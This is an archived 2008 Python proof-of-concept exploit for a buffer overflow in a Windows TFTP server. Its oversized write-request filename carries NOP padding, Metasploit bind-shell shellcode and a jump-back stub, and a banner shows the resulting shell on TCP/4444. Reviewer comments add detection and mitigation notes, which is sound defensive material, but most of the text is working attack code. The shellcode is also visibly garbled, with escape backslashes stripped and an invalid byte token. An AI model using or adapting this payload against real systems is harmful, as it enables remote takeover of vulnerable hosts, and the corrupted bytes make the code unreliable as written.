
sourceforge-tftpd.py.txt

Posted on 27 March 2008

#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##################################################################
#
# Reviewer notes (archived 2008 proof-of-concept, Python 2 syntax):
#
# What the script does, as far as the code shows: it builds a single UDP
# datagram whose first two bytes are the TFTP opcode 0x0002 (a write
# request, RFC 1350), followed by a "filename" field that is well over a
# kilobyte long, and sends it once to UDP/69 on the hard-coded host. A
# conforming TFTP request carries a short filename, a NUL, a mode string
# and a NUL, and RFC 1350 datagrams are at most 516 bytes, so the payload
# relies on the server copying the oversized filename into a fixed-size
# buffer without a length check (the usual memory-safety bug behind
# vulnerabilities of this shape; the exact bug is not visible here).
#
# Detection: a TFTP request whose filename field is hundreds of bytes or
# more, or any TFTP datagram larger than 516 bytes, is anomalous and is
# cheap to alert on (UDP/69, opcode 1 or 2). Per the banner above, the
# post-exploitation indicator is the TFTP host starting an unexpected
# listener on TCP/4444.
#
# Mitigation: do not expose UDP/69 beyond the networks that need it, run
# the TFTP service under a least-privilege account, and block unexpected
# inbound listeners with a host firewall; prefer a maintained TFTP
# implementation for the role.
#
# NOTE(review): the "\x" escapes in the string literals below appear to
# have been stripped when the page was extracted, so as pasted they are
# plain ASCII text rather than byte sequences. Left exactly as found.
import socket
import sys

# Banner output (Python 2 print statements).
print "[*] TFTP Server for Windows V1.4 ST (0day)"
print "[*] http://www.offensive-security.com"

# Target is hard-coded to the author's lab host; UDP/69 is the TFTP port.
host = '172.16.167.134'
port = 69

# Bare except: also swallows KeyboardInterrupt/SystemExit and hides the
# real socket error; `except socket.error` would be the narrow form.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

# Jump back shellcode
sc = "x6ax05x59xd9xeexd9x74x24xf4x5bx81x73x13x16x91x9c"
sc +="x30x83xebxfcxe2xf4xcfx7fx45x44x32x65xc5xb0xd7x9b"
sc +="x0cxcexdbx6fx51xcfxf7x91x9cx30"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
shell=("xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
"x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66"
"x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51"
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0"
"x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93"
"x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66"
"x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38"
"xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57"
"x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9"
"x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83"
"xc4x64xffxd6x52xffxd0x68xf0x8ax04x5fx53xffxd6"
"xffxd0")

# The "filename" field of the request: padding, the payload above, more
# padding and a short trailer. Its length alone (far beyond any legitimate
# path) is what a network detector should key on.
filename = "x90"*860 + shell + "x90"*14 + sc + "xebxd0x90x90" + "x2bxoex41"
mode = "netascii"

# TFTP write request: opcode 0x0002, filename, terminator, mode, terminator
# (the terminators are empty strings as pasted; see the NOTE above).
muha = "x00x02" + filename+ "" + mode+ ""

print "[*] Sending evil packet, ph33r"
# A single datagram; nothing is read back, so success is only observable
# on the target side (see the banner for the author's indicator).
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"

 
